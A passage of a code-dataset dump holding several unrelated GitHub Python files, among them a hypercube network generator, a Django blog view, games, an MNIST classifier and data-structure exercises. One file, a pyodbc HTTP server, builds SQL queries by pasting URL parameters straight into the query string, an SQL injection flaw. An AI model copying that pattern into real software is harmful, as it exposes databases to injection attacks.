0:\n\t\tmsg = \"rows and columns must both be powers of 2\"\n\t\terror(__file__, msg)\n\n\t# Compute size of bit-vectors that represent tile IDs.\n\trow_dimensions = int(math.log2(rows))\n\tcol_dimensions = int(math.log2(cols))\n\tdimensions = row_dimensions + col_dimensions \n\t\n\t# Compute gray code for rows and columns\n\trow_gc = list(GrayCode(row_dimensions).generate_gray())\n\tcol_gc = list(GrayCode(col_dimensions).generate_gray())\n\n\t# Maps to arrange rows and columns in gray code style\n\t# This ensures that mesh-like links are always part of the Hypercube topology\n\trow_map = {int(row_gc[i],2) : i for i in range(rows)}\n\tcol_map = {int(col_gc[i],2) : i for i in range(cols)}\n\n\t# Create Tile...\n\ttile_name = module_name\n\t# ...Add ports for mesh-like connections\n\tmports = []\n\tsports = []\n\tmports.append({\"face\" : \"north\", \"align\" : -1})\n\tsports.append({\"face\" : \"north\", \"align\" : 1})\n\tmports.append({\"face\" : \"east\", \"align\" : -1})\n\tsports.append({\"face\" : \"east\", \"align\" : 1})\n\tmports.append({\"face\" : \"south\", \"align\" : 1})\n\tsports.append({\"face\" : \"south\", \"align\" : -1})\n\tmports.append({\"face\" : \"west\", \"align\" : 1})\n\tsports.append({\"face\" : \"west\", \"align\" : -1})\n\t# ...Add ports for remaining column-links\n\tcol_hop_start_id = 4\n\tnports = max(row_dimensions-2,0)\n\tfor i in range(nports):\n\t\tmports.append({\"face\" : \"north\", \"align\" : -1})\n\t\tsports.append({\"face\" : \"north\", \"align\" : 1})\n\t# ...Add ports for remaining row-links\n\trow_hop_start_id = 4 + nports\n\tnports = max(col_dimensions-2,0)\n\tfor i in range(nports):\n\t\tmports.append({\"face\" : \"east\", \"align\" : -1})\n\t\tsports.append({\"face\" : \"east\", \"align\" : 1})\n\t# ...Create tile\n\tcreate_tile(tile_name, area, n_endpoints, mports, sports)\n\t\n\t# Compose a list of edges that are part of the hypercube topology\n\tedges = []\n\tfor i in range(2**dimensions):\n\t\tstart = list(bin(i)[2:]) \n\t\tstart = [\"0\" for j in range(dimensions - len(start))] + start\n\t\tfor j in range(dimensions):\t\n\t\t\tend = copy.deepcopy(start)\n\t\t\tend[j] = \"1\" if end[j] == \"0\" else \"0\"\n\t\t\tedges.append((start, end))\n\n\t# Maps a tile to its lowest available port-id for column and row links\n\tm_col_hop_id = {(row,col) : col_hop_start_id for row in range(rows) for col in range(cols)}\n\ts_col_hop_id = {(row,col) : col_hop_start_id for row in range(rows) for col in range(cols)}\n\tm_row_hop_id = {(row,col) : row_hop_start_id for row in range(rows) for col in range(cols)}\n\ts_row_hop_id = {(row,col) : row_hop_start_id for row in range(rows) for col in range(cols)}\n\n\t# Add connections...\n\tconnections = []\n\tfor edge in edges:\n\t\t# ...Extract start and end tile ids\n\t\t(start, end) = edge\n\t\tstart = \"\".join(start)\n\t\tend = \"\".join(end)\n\t\t# ...Translate tile ids to tile locations\n\t\t(srow,scol) = bin_to_rc(start, rows, cols)\n\t\t(erow,ecol) = bin_to_rc(end, rows, cols)\n\t\t# ...Set ports for mesh-like connections\n\t\tif scol == ecol and (srow + 1) % rows == erow:\n\t\t\tsport = 0\n\t\t\teport = 2\n\t\telif scol == ecol and (srow - 1) % rows == erow:\n\t\t\tsport = 2\n\t\t\teport = 0\n\t\telif srow == erow and (scol + 1) % cols == ecol:\n\t\t\tsport = 1\n\t\t\teport = 3\n\t\telif srow == erow and (scol - 1) % cols == ecol:\n\t\t\tsport = 3\n\t\t\teport = 1\n\t\t# ...Set ports for remaining column-connections\n\t\telif scol == ecol:\n\t\t\tsport = m_col_hop_id[(srow,scol)]\n\t\t\tm_col_hop_id[(srow,scol)] += 1\n\t\t\teport = s_col_hop_id[(erow,ecol)]\n\t\t\ts_col_hop_id[(erow,ecol)] += 1\n\t\t# ...Set ports for remaining row-connections\n\t\telif srow == erow:\n\t\t\tsport = m_row_hop_id[(srow,scol)]\n\t\t\tm_row_hop_id[(srow,scol)] += 1\n\t\t\teport = s_row_hop_id[(erow,ecol)]\n\t\t\ts_row_hop_id[(erow,ecol)] += 1\n\t\telse:\n\t\t\tmsg = \"Invalid connection direction\"\n\t\t\terror(__file__, msg)\n\t\tconnections.append(((srow,scol,sport),(erow,ecol,eport)))\n\n\t# Place and Router\n\tplace_and_route(module_name, tile_name, tech, prot, bw, freq, rows, cols, connections)\n\n### Main ###\nif __name__ == \"__main__\":\n\targs = sys.argv\n\tif len(args) < 10:\n\t\tprint(\"Usage: python generate_hypercube.py <#endpoints>\"+\\\n\t\t\t \" \")\n\t\tsys.exit()\n\n\tgenerate(args[1], int(args[2]), int(args[3]), args[4], args[5], int(args[6]), \n\t\t\tint(float(args[7])), int(args[8]), int(args[9]), [])\n\n","repo_name":"eanorige/sparse_hamming_graph_public","sub_path":"src/generate_hypercube.py","file_name":"generate_hypercube.py","file_ext":"py","file_size_in_byte":5081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71277118488","text":"from django.shortcuts import render\r\nfrom .models import Post, comment\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom .forms import CommentForm\r\nfrom accounts.models import userTips\r\ndef blog(request):\r\n\treturn render(request, 'blog/blog.html', {'posts':Post.objects.all()})\r\n\t\r\n\r\n@login_required\r\ndef single_blog(request,id):\r\n post = Post.objects.get(id=id)\r\n comments = comment.objects.filter(post=post)\r\n if request.method == \"POST\":\r\n add_comment = CommentForm(request.POST,request.FILES)\r\n if add_comment.is_valid():\r\n\t add_comment = add_comment.save(commit=False)\r\n\t add_comment.user = userTips.objects.get(user=request.user)\r\n\t add_comment.post = post\r\n\t add_comment.save()\r\n return render(request, 'blog/single_blog.html', {'post':post,'comments':comments})\r\n\t","repo_name":"Abdelrahman-Moharram/Learn-Django","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31758987935","text":"import random\r\nimport os\r\n\r\ndef resultado(ganhou, empate, perdeu):\r\n print(\"\\nResultado:\")\r\n print(f\"Vitórias: {ganhou}\")\r\n print(f\"Empates: {empate}\")\r\n print(f\"Derrotas: {perdeu}\\n\")\r\n \r\n\r\ndef escolha(numero):\r\n if numero == 1:\r\n return \"Pedra\"\r\n elif numero == 2:\r\n return \"Papel\"\r\n else:\r\n return \"Tesoura\"\r\n\r\ndef jogar():\r\n opcao = 0\r\n ganhou = 0\r\n perdeu = 0\r\n empate = 0\r\n\r\n while opcao != 4:\r\n resposta = input(\"--- Escolha uma opção: ---\\n 1 - Pedra\\n 2 - Papel\\n 3 - Tesoura\\n 4 - Zerar\\nOpção: \")\r\n os.system(\"cls\")\r\n \r\n if resposta:\r\n opcao = int(resposta)\r\n else:\r\n opcao = 99\r\n\r\n if opcao == 4:\r\n break\r\n elif opcao >= 1 and opcao <= 3:\r\n maquina = random.randint(1, 3)\r\n escolha_maquina = escolha(maquina)\r\n escolha_jogador = escolha(opcao)\r\n\r\n print(f\"\\nVocê: {escolha_jogador}\\nMáquina: {escolha_maquina}\\n\")\r\n\r\n if opcao == 1:\r\n if maquina == 3:\r\n ganhou += 1\r\n print(\"Uhuu, você ganhou!!\")\r\n elif maquina == 1:\r\n empate += 1\r\n print(\"Empatou\")\r\n else:\r\n perdeu += 1\r\n print(\"Perdeu\")\r\n \r\n elif opcao == 2:\r\n if maquina == 1:\r\n ganhou += 1\r\n print(\"Uhuu, você ganhou!!\")\r\n elif maquina == 2:\r\n empate += 1\r\n print(\"Empatou\")\r\n else:\r\n perdeu += 1\r\n print(\"Perdeu\")\r\n \r\n elif opcao == 3:\r\n if maquina == 2:\r\n ganhou += 1\r\n print(\"Uhuu, você ganhou!!\")\r\n elif maquina == 3:\r\n empate += 1\r\n print(\"Empatou\")\r\n else:\r\n perdeu += 1\r\n print(\"Perdeu\")\r\n \r\n else:\r\n print(\"Opção inválida\")\r\n\r\n resultado(ganhou, empate, perdeu)\r\n\r\n resultado(ganhou, empate, perdeu)\r\n print(\"Jogo Encerrado, muito obrigado!\\n\")\r\n\r\nwhile True:\r\n print(\"Jokempô(Rock - Paper- Sicssor)\\n\")\r\n \r\n print(\"Escolha uma opção: \")\r\n opcao_jogo = int(input(\"1 - Iniciar Jogo \\n2 - Para sair\\n\"))\r\n os.system(\"cls\")\r\n \r\n if opcao_jogo == 1:\r\n jogar()\r\n else:\r\n print(\"Você está desligando o jogo, muito obrigado e volte sempre!\\n\")\r\n print(\"JOGO FEITO POR: ALOISIO VITORIO\")\r\n input()\r\n break\r\n","repo_name":"Aloisio12/Jokempo_Rock-Paper-Sicssor_with-Python","sub_path":"Jokempô(Rock - paper- sissors).py","file_name":"Jokempô(Rock - paper- sissors).py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32418331228","text":"from http.server import HTTPServer, BaseHTTPRequestHandler\r\nfrom urllib.parse import urlparse\r\nimport pyodbc\r\n\r\nconn = pyodbc.connect('Driver={SQL Server};'\r\n 'Server=DESKTOP-1RH354G;'\r\n 'Database=digiDB;'\r\n 'Trusted_Connection=yes;')\r\n\r\n\r\n\r\n\r\nclass SimpleHTTPRequestHandler(BaseHTTPRequestHandler):\r\n _columns = {\r\n \"digital_commodities\": [\"commodity_id\", \"name\", \"number_sold\", \"price\", \"number_in_store\", \"color\", \"weight\",\r\n \"immediate_sending\", \"brand\", \"promotion_id\"],\r\n \"laptops\": [\"graphics\", \"cpu\", \"ram\"],\r\n \"mobiles\": [\"ram\", \"internal_storage\", \"os\", \"camera_resolution\"],\r\n \"case_covers\": [\"material\", \"size\", \"mobile\", \"mobile_os\"],\r\n \"assembled_cases\": [\"ram\", \"storage\"],\r\n \"computers_accessories\": [],\r\n \"external_hards\": [\"capacity\"],\r\n \"keyboards\": [\"connection_type\", \"background_light\"],\r\n \"monitors\": [\"screen_size\", \"resolution\"],\r\n \"phone_accessories\": [],\r\n \"phone_holder_bases\": [\"material\"],\r\n \"powerbanks\": [\"capacity\", \"number_ports\"]\r\n }\r\n\r\n def do_GET(self):\r\n bits = urlparse(self.path)\r\n cursor, columns_names = self.database(self.parse_query(bits.query.split('&')))\r\n\r\n self.send_response(200)\r\n self.end_headers()\r\n\r\n html_string = self.fill_html_string(cursor , columns_names)\r\n self.wfile.write(bytes(html_string, \"utf-8\"))\r\n\r\n\r\n def do_POST(self):\r\n self.send_response(200)\r\n self.end_headers()\r\n\r\n def do_PUT(self):\r\n self.send_response(200)\r\n self.end_headers()\r\n\r\n def parse_query(self, query: list):\r\n if len(query) != 3:\r\n return -1\r\n\r\n type_value = query[0][5:]\r\n name_value = query[1][5:]\r\n immediate_value = query[2][10:]\r\n return {'type_value': type_value,\r\n 'name_value': name_value,\r\n 'immediate_value': immediate_value}\r\n\r\n def database(self, fields: dict):\r\n if fields == -1:\r\n return -1 , -1\r\n cursor = conn.cursor()\r\n\r\n select_columns = \"\"\r\n select_columns_list = []\r\n for name in self._columns[\"digital_commodities\"]:\r\n if name == \"commodity_id\":\r\n select_columns += \" c.\"\r\n else:\r\n select_columns += \" \"\r\n select_columns += name + \",\"\r\n select_columns_list.append(name)\r\n\r\n for name in self._columns[fields[\"type_value\"]]:\r\n select_columns += \" \" + name + \",\"\r\n select_columns_list.append(name)\r\n\r\n select_columns = select_columns[:-1]\r\n\r\n query = 'SELECT ' + select_columns + ' FROM digital_commodities c,' + fields['type_value'] + \\\r\n ' v where c.commodity_id=v.commodity_id'\r\n\r\n #print(select_columns)\r\n\r\n if fields['name_value'] != \"\":\r\n query += \" and c.name LIKE '%\" + fields['name_value'] + \"%'\"\r\n\r\n if fields['immediate_value'] != 'None':\r\n query += ' and c.immediate_sending=' + fields['immediate_value']\r\n\r\n cursor.execute(query)\r\n return cursor, select_columns_list\r\n\r\n def fill_html_string(self, cursor , columns_names):\r\n if cursor == -1:\r\n return ''\r\n\r\n style_file = open(\"style.txt\", \"r\") # read css file \r\n html_string = \"\" \\\r\n \"Digatal Database \"\r\n html_string += style_file.read()\r\n html_string += \"\" \\\r\n \"\"\r\n\r\n for node in columns_names:\r\n html_string += ''\r\n \r\n html_string += ''\r\n \r\n for row in cursor:\r\n html_string += ''\r\n #html_string += str(row)\r\n for node in row: \r\n html_string += ''\r\n html_string += ''\r\n\r\n\r\n html_string += \"
    ' + str (node) + '
    ' + str(node) + '
    \"\r\n #print(html_string)\r\n return html_string\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nhttpd = HTTPServer(('', 8080), SimpleHTTPRequestHandler)\r\nprint(\"waiting...\")\r\nhttpd.serve_forever()\r\n","repo_name":"arash99s/digitalDB","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70504947607","text":"import csv\nimport os\nimport random\n\nimport nltk\nimport torch\nimport numpy as np\nfrom torch.backends import cudnn as cudnn\n\nfrom models import InfersentAdaptor\n\n\ndef load_infersent(infersent_path, return_adaptor=False, use_cuda=torch.cuda.is_available()):\n infersent = torch.load(infersent_path) if use_cuda else \\\n torch.load(infersent_path, map_location=lambda storage, loc: storage)\n if return_adaptor:\n infersent = InfersentAdaptor(infersent)\n return infersent\n\n\ndef load_csv_corpus(path):\n labels = []\n sents = []\n with open(path, 'r') as f:\n reader = csv.reader(f)\n for item in reader:\n labels.append(int(item[0]))\n tmp_doc = item[1].strip()\n sents.append(tmp_doc)\n ids = range(len(sents))\n return sents, labels, ids\n\n\ndef encode_sents(infersent, sents, split_sents=False, layer_norm=False):\n if False:\n if split_sents:\n all_feat = []\n for doc in sents:\n tmp_sents = nltk.sent_tokenize(doc)\n tmp_feat = infersent.encode(tmp_sents, tokenize=False, layer_norm=layer_norm)\n all_feat.append(tmp_feat.mean(axis=0))\n feat = np.stack(all_feat, axis=0)\n else:\n feat = infersent.encode(sents, tokenize=False, layer_norm=layer_norm)\n else:\n feat = infersent_encode_sents(infersent, sents, split_sents=split_sents, layer_norm=layer_norm)\n return feat\n\n\ndef infersent_encode_sents(infersent, sents, split_sents=False, layer_norm=False, batch_size=256, verbose=False):\n if split_sents:\n all_feat = []\n batch_sents = []\n batch_slens = []\n for doc_id, doc in enumerate(sents):\n tmp_sents = nltk.sent_tokenize(doc)\n # Put current batch and batch_size respectively into batch_sents and batch_slens.\n batch_sents.extend(tmp_sents)\n batch_slens.append(len(batch_sents))\n # If current sents list size > batch_size,\n # encode all sents by infersent, get paragraph vector and reset batch_sents and batch_slens.\n if len(batch_sents) >= batch_size or doc_id == len(sents) - 1:\n batch_feat = infersent.encode(batch_sents, tokenize=False, layer_norm=layer_norm)\n for i, tmp_len in enumerate(batch_slens):\n bidx = batch_slens[i-1] if i > 0 else 0\n eidx = batch_slens[i]\n tmp_feat = batch_feat[bidx:eidx]\n all_feat.append(tmp_feat.mean(axis=0))\n batch_sents = []\n batch_slens = []\n if verbose:\n print('Infersent Processed {} Text'.format(doc_id+1))\n assert len(sents) == len(all_feat)\n feat = np.stack(all_feat, axis=0)\n else:\n feat = infersent.encode(sents, tokenize=False, layer_norm=layer_norm)\n return feat\n\n\ndef load_constraint_file(path):\n constraints = []\n with open(path, 'r') as f:\n reader = csv.reader(f)\n for item in reader:\n constraints.append((int(item[0]), int(item[1])));\n return constraints\n\n\ndef cluster_acc(y_true, y_pred):\n \"\"\"\n Calculate clustering accuracy. Require scikit-learn installed\n\n # Arguments\n y: true labels, numpy.array with shape `(n_samples,)`\n y_pred: predicted labels, numpy.array with shape `(n_samples,)`\n\n # Return\n accuracy, in [0,1]\n \"\"\"\n y_true = y_true.astype(np.int64)\n y_pred = y_pred.astype(np.int64)\n assert y_pred.size == y_true.size, 'y_pred.size {} y_true.size {}'.format(y_pred.size, y_true.size)\n D = max(y_pred.max(), y_true.max()) + 1\n w = np.zeros((D, D), dtype=np.int64)\n for i in range(y_pred.size):\n w[y_pred[i], y_true[i]] += 1\n from sklearn.utils.linear_assignment_ import linear_assignment\n ind = linear_assignment(w.max() - w)\n return sum([w[i, j] for i, j in ind]) * 1.0 / y_pred.size\n\n\ndef align_labels(y_true, y_pred):\n y_true = y_true.astype(np.int64)\n y_pred = y_pred.astype(np.int64)\n assert y_pred.size == y_true.size, 'y_pred.size {} y_true.size {}'.format(y_pred.size, y_true.size)\n D = max(y_pred.max(), y_true.max()) + 1\n w = np.zeros((D, D), dtype=np.int64)\n for i in range(y_pred.size):\n w[y_pred[i], y_true[i]] += 1\n from sklearn.utils.linear_assignment_ import linear_assignment\n ind = linear_assignment(w.max() - w)\n return ind\n\n\ndef dump_feat(feat_path, feat, labels=None, ids=None):\n import h5py\n f = h5py.File(feat_path, 'w')\n f['feat'] = feat.astype(dtype=np.float32)\n if labels is not None:\n f['labels'] = np.array(labels)\n if ids is not None:\n f['ids'] = np.array(ids)\n f.close()\n\n\ndef load_feat(feat_path):\n import h5py\n f = h5py.File(feat_path, 'r')\n feat = np.array(f['feat'], dtype=np.float32)\n labels = None\n ids = None\n if 'labels' in f.keys():\n labels = np.array(f['labels'])\n if 'ids' in f.keys():\n ids = np.array(f['ids'])\n return feat, labels, ids\n\n\ndef initialize_environment(random_seed=50, use_cuda=torch.cuda.is_available()):\n # Set the seed for reproducing the results\n random.seed(random_seed)\n np.random.seed(random_seed)\n torch.manual_seed(random_seed)\n if use_cuda:\n torch.cuda.manual_seed_all(random_seed)\n torch.backends.cudnn.enabled = True\n cudnn.benchmark = True\n\n\ndef load_seeds_dict(path):\n import csv\n from collections import defaultdict\n results = defaultdict(list)\n if os.path.exists(path):\n with open(path) as f:\n reader = csv.reader(f)\n for item in reader:\n i = int(item[0])\n l = int(item[1])\n results[l].append(i)\n return results\n","repo_name":"KEAML-JLU/DeepTextClustering","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5770,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"32443466594","text":"x,y=input().split()\nif x.isalpha():\n print(\"Invaild\")\nelse:\n x=int(x)\n y=int(y)\n arm=int(0)\n for i in range(x,y):\n chk=int(i)\n arm=0\n\n while chk!=0:\n z=chk%10;\n \n arm=arm+(z**3)\n chk=int(chk/10)\n\n if arm==i:\n print(i)\n","repo_name":"manunag/GUVI","sub_path":"beg18.py","file_name":"beg18.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30524213461","text":"class Node:\n def __init__(self,initdata):\n self.data=initdata\n self.next=None\n self.before=None\n\n def getdata(self):\n return self.data\n def getnext(self):\n return self.next\n def getbefore(self):\n return self.before\n\n def setdata(self,newdata):\n self.data=newdata\n def setnext(self,newnext):\n self.next=newnext\n def setbefore(self,newnext):\n self.before=newnext\n\nclass DoubleLinkedList:\n def __init__(self):\n self.head=None\n self.end=None\n def isempty(self):\n return self.head==None\n def addhead(self,newdata):\n temp=Node(newdata)\n temp.setnext(self.head)\n if self.head==None:\n self.head=temp\n self.end=temp\n else:\n self.head.setbefore(temp)\n self.head=temp\n def addend(self,newdata):\n temp=Node(newdata)\n temp.setbefore(self.end)\n if self.end==None:\n self.head=temp\n self.end=temp\n else:\n self.end.setbefore(temp)\n self.end=temp\n def length(self):\n size=0\n node=self.head\n while node!=None:\n size+=1\n node=node.getnext()\n return size\n def search(self,target):\n found=False\n current=self.head\n while current!=None and found==False:\n if current.getdata()==target:\n found=True\n current=current.getnext()\n return found\n def remove(self,target):\n found = False\n current = self.head\n previous=None\n while current != None and found == False:\n if current.getdata() == target:\n if previous!=None:\n previous.setnext(current.getnext())\n else:\n self.head=current.getnext()\n found = True\n else:\n previous=current\n current = current.getnext()\n return found\n\n#test\nmylist=DoubleLinkedList()\nmylist.addhead(31)\nmylist.addhead(11)\nmylist.addhead(21)\nmylist.addhead(4)\nmylist.addhead(54)\nmylist.remove(31)\nmylist.remove(11)\nmylist.search(31)\n\n","repo_name":"neil-n-zhang/data-structures-using-python","sub_path":"Chapter3/doublelinkedlist3_27.py","file_name":"doublelinkedlist3_27.py","file_ext":"py","file_size_in_byte":2180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27133191475","text":"# @echo off\n# rem='''\n# set pythonioencoding=utf8\n# python -i -x \"%~f0\" %*\n# exit /b \n# '''\n\n\n\nimport fileinput as fi\nfrom sys import argv as a\nfrom pathlib import Path as p\nfrom os import system as sys\nfrom re import search\nsys('')\ndef r(i=None,e='utf8'):\n with fi.FileInput(files=i,openhook=fi.hook_encoded(e, 'backslashreplace')) as f:\n yield from ((x.rstrip('\\n'),f) for x in f)\n\nh = lambda z:(j for x in z for j in x)\n\n\nm = lambda x=0:f'\\33[{x}m'\n\ns = lambda x:repr(x)[1:-1]if search(r'[\\x00-\\x08\\x0b-\\x1f]',x) else x \nsp = lambda k,x:h((x[:a],x[a:b],x[b:]) for a,b in (search(k,x).span(),))\ntpl = ('',m('7;37'),m(0))\nw = lambda x,k:''.join(h(zip(tpl,map(s,sp(k,x)))))\nlr = il = lambda k,x: k in x\nir = lambda k,x: search(k,x)\nf = lambda i,k:((y.filename(),y.filelineno(),w(x.strip(),k)) for x,y in i if lr(k,x))\n\npre = [*map(m,('7;32','7;36',0))]\nc = lambda z:zip(pre,z)\n\ne = m(0)+'\\n'\n\nk,i=a[1:2]and a[1]or 'pyd',a[2:3]and a[2]or '*.7z'\nlr = ir if k[0]==k[-1]=='\\'' else il \nk = k[1:-1] if lr==ir else k\nany(print(*h(c(x)),end=e) for y in p().glob(i) if y.is_file() for x in f(r([y]),k))\n\n\n\n","repo_name":"c1ino/py3toys","sub_path":"findstr.py","file_name":"findstr.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70076576089","text":"\"\"\"\n- MNIST\n- DataLoader, Transformation\n- Multilayer Neural Net with activation functions\n- Loss and optimizer\n- Training loop\n- Model evaluation\n- GPU support? -> Need special version for M1, need to investigate\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torchvision\nfrom torchvision.transforms import ToTensor, Compose\nfrom torch.utils.data import DataLoader\nimport matplotlib.pyplot as plt\n\n# seed\nSEED = 42\ntorch.manual_seed(SEED)\n\n#\nPRINT_EVERY_NTH_ITERATION = 100\n\nLEARNING_RATE = 1e-3\nBATCH_SIZE = 128\nN_EPOCH = 3\n\n# regularization\nL2_NORM = 0\n\n#===data====\n# # inspection on the raw data\n# X0 = torchvision.datasets.MNIST('data', train=False, transform=ToTensor())[0][0]\n# y0 = torchvision.datasets.MNIST('data', train=False, transform=ToTensor())[0][1]\n# print(X0.shape) # [1, 28, 28]: 1 channel, 28*28 pixel\n\n# plt.imshow(X0[0], cmap='gray') # only get the value of the first channel, as it only has one channel anyway\n# plt.show()\n# print(y0)\n\n\n# MNIST Dataloader and Transformation\nclass Flatten:\n def __call__(self, X):\n return X.reshape(-1) # (1, 28, 28) -> (784,)\n\nmnist = torchvision.datasets.MNIST('data', train=True, transform=Compose([ToTensor(), Flatten()]))\ndataloader = DataLoader(dataset=mnist, batch_size=BATCH_SIZE, shuffle=True, drop_last=True)\nn_samples = len(mnist) #60000\nn_features = mnist[0][0].shape[0]\nn_classes = 10\n\n\n\n# model\nclass MultiLayer(nn.Module):\n def __init__(self, n_features, n_classes):\n super().__init__()\n self.linear1 = nn.Linear(n_features, 256)\n self.relu1 = nn.ReLU()\n self.linear2 = nn.Linear(256, 64)\n self.relu2 = nn.ReLU()\n self.out = nn.Linear(64, n_classes)\n\n def forward(self, x):\n out = self.linear1(x)\n out = self.relu1(out)\n out = self.linear2(out)\n out = self.relu2(out)\n out = self.out(out)\n return out\n\n# Loss and optimizer\nmodel = MultiLayer(n_features=n_features, n_classes=n_classes)\ncriterion = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=LEARNING_RATE, weight_decay=L2_NORM)\n# Training loop\nfor epoch in range(N_EPOCH):\n for i, (X, y) in enumerate(dataloader):\n # forward\n y_pred = model(X)\n loss = criterion(y_pred, y)\n\n # backward\n loss.backward()\n\n # update\n optimizer.step()\n optimizer.zero_grad()\n\n # info: logging \n if (i + 1) % PRINT_EVERY_NTH_ITERATION == 0:\n print(f'epoch: {epoch + 1}, iteration: {i + 1}, loss: {loss: .8f}')\n\n\n# ==== evaluation=====\ndef evaluate(dataset) -> float:\n with torch.no_grad():\n data = DataLoader(dataset=dataset, batch_size=len(dataset), shuffle=False, drop_last=False)\n X, y = iter(data).next()\n # print(f\"X.shape, y.shape: {X.shape, y.shape}\")\n \n y_pred = model(X)\n y_cls = torch.argmax(y_pred, dim=1)\n micro_accuracy = y_cls.eq(y).sum()/y.shape[0]\n # print(f\"y_cls.shape, y.shape: {y_cls.shape, y.shape}\")\n print(f\"The micro accuracy is: {micro_accuracy}\")\n return micro_accuracy\n\n# Model evaluation on train\ntrain_dataset = torchvision.datasets.MNIST('data', train=True, transform=Compose([ToTensor(), Flatten()]))\ntrain_accuracy = evaluate(train_dataset)\n# Model evaluation on test\ntest_dataset = torchvision.datasets.MNIST('data', train=False, transform=Compose([ToTensor(), Flatten()]))\ntest_accuracy = evaluate(test_dataset)\n\n ","repo_name":"AlsonYang/study-pytorch","sub_path":"6_MNIST_classification.py","file_name":"6_MNIST_classification.py","file_ext":"py","file_size_in_byte":3440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31965041934","text":"from collections import defaultdict\nimport pprint\n\n\n''' This class represents an undirected weighted graph using adjacency list representation '''\nclass Graph:\n\n def __init__(self,vertices=0):\n self.V= vertices # No. of vertices\n self.cost = 0 # Weight sum of all added edges\n self.graph = defaultdict(list) # default dictionary to store graph\n\n def addEdge(self,u,v, weight):\n ''' Function to add an edge to graph '''\n\n self.cost += weight\n self.graph[u].append((v,weight))\n self.graph[v].append((u,weight))\n\n \n def delEdge(self, u, v):\n ''' This function removes edge u-v from graph '''\n\n for index, key in enumerate(self.graph[u]):\n if key == v:\n self.graph[u].pop(index)\n for index, key in enumerate(self.graph[v]):\n if key == u:\n self.graph[v].pop(index)\n\n def rmvEdge(self, u, v, w):\n ''' This function removes edge u-v-w from graph '''\n\n for index, key in enumerate(self.graph[u]):\n if key[0] == v and key[1] == w:\n self.graph[u].pop(index)\n for index, key in enumerate(self.graph[v]):\n if key[0] == u and key[1] == w:\n self.graph[v].pop(index)\n\n ","repo_name":"GiulioPiazza/CPP","sub_path":"Graph.py","file_name":"Graph.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2966860857","text":"list = []\na,b = map(int,input().split())\nfor x in range(1,47):\n for y in range(x):\n list.append(x)\nnum = 0\nif(a < b):\n for i in range(b-a+1):\n num = num + list[a-1 + i]\nif(a == b):\n num = list[a-1]\nprint(num)","repo_name":"bria051/Algorithm","sub_path":"Math/mathematics_test.py","file_name":"mathematics_test.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"69804470809","text":"from typing import List\n\ndef binary_search(nums: List[int], target: int, lower: bool) -> int:\n n = len(nums)\n left, right, ans = 0, n - 1, n\n while left <= right:\n index = (left + right) // 2\n mid = nums[index]\n if mid > target or (lower and mid >= target):\n right = index - 1\n ans = index\n else:\n left = index + 1\n \n return ans\n\ndef searchRange(nums: List[int], target: int) -> List[int]:\n left = binary_search(nums, target, True)\n right = binary_search(nums, target, False) - 1\n if left <= right and right < len(nums) and nums[left] == target and nums[right] == target:\n return [left, right]\n return[-1, -1]\n\n\nif __name__ == \"__main__\":\n print(searchRange(nums = [5,7,7,8,8,10], target = 8))","repo_name":"DengBoCong/Algorithm","sub_path":"core/tmp/Python/array/find_first_and_last_position_of_element_in_sorted_array.py","file_name":"find_first_and_last_position_of_element_in_sorted_array.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"31"} +{"seq_id":"40931239652","text":"if __name__=='__main__' :\n arr=list(input().split())\n\n result=[int(arr[0])] #수열 저장\n temp=[] #제거되는 것 저장\n x=arr[0] # 수\n\n while True:\n sum=0 #합\n for i in str(x):\n sum+=int(i)**int(arr[1]) #수열 구하기\n x=sum\n\n if sum in result: #반복되는 것이라면 제거\n temp.append(sum) #제거된 것인걸 저장하기 위해 \n result.remove(sum) #제거\n elif sum in temp: #이미 제거되었던 것이라면 계속 반복 break\n break\n else: #처음 나오는 수라면\n result.append(sum)\n\n print(len(result))","repo_name":"Parksohui/Algorithm","sub_path":"Baekjoon/백준2331반복수열.py","file_name":"백준2331반복수열.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21107072219","text":"from fastapi import FastAPI\nimport pandas as pd\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import linear_kernel\n\napp = FastAPI()\n\n@app.get('/peliculas_idioma/{idioma}')\ndef peliculas_idioma(idioma:str):\n df = pd.read_csv('langpeli.csv')\n d = df.loc[df.language == idioma]\n c = d['num_movies'].to_list()[0]\n \n return{'Idioma:':idioma, 'cantidad de peliculas:':c}\n\n@app.get('/peliculas_duracion/{pelicula}')\ndef peliculas_duracion(pelicula:str):\n ##Se ingresa una pelicula y devuelve la duracion y el año\n df = pd.read_csv('pelidur.csv')\n d = 